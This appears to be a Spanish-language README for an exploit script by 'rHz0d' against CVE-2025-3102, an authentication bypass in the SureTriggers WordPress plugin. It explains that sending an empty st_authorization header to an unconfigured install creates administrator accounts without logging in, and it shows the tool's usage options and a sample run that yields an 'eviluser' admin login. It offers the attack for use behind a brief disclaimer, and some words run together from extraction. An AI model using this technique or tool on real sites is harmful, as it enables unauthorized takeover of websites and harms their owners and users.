
Wordpress SureTriggers <= 1.0.78 - Bypass de autorización debido a falta de comprobación de valor vacío que permite la creación de usuario administrativo no autenticado
🚨 CVE-2025-3102 es una vulnerabilidad crítica de omisión de autenticación que afecta al plugin de WordPress SureTriggers: All-in-One Automation Platform, el cual está instalado activamente en más de 100,000 sitios web. Debido a la naturaleza de la falla y la escala de implementación, esta vulnerabilidad representa un riesgo de seguridad significativo.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:HEl plugin SureTriggers para WordPress es vulnerable a una omisión de autenticación que permite a atacantes no autenticados crear cuentas de administrador. Esto se debe a una falta de verificación de valor vacío en el secret_key dentro de la función autheticate_user.
Cuando el plugin está instalado y activado pero no configurado con una clave API, los atacantes pueden omitir la autenticación enviando un encabezado st_authorization vacío, desencadenando acciones reservadas para usuarios autenticados.
Se proporciona un script en Python para automatizar la explotación de esta vulnerabilidad.
Este script permite generar un nuevo usuario administrador en sitios vulnerables.
readme.txtst_authorization vacíousage: CVE-2025-3102.py [-h] -u URL [-nmail NEWMAIL] [-nu NEWUSER] [-np NEWPASSWORD]
SureTriggers <= 1.0.78 - Authorization Bypass Exploit
By: rHz0d
options:
-h, --help Show this help message and exit
-u, --url URL Target WordPress base URL
-nmail, --newmail NEWMAIL Email to register
-nu, --newuser NEWUSER Username to register
-np, --newpassword NEWPASSWORD Password for the new user
[+] Detected plugin version: 1.0.78
[+] Vulnerable version detected. Proceeding...
[*] Exploiting the target in 3 seconds...
[+] Email generated: [email protected]
[+] Username generated: eviluser
[+] Password generated: P@ssw0rd123!
[+] Exploit Successful!
[+] Login credentials: eviluser:P@ssw0rd123!
Este script se proporciona solo con fines educativos.
El uso no autorizado de este código contra objetivos sin permiso explícito es ilegal.
El autor no asume ninguna responsabilidad por cualquier mal uso o daño causado.
Por: rHz0d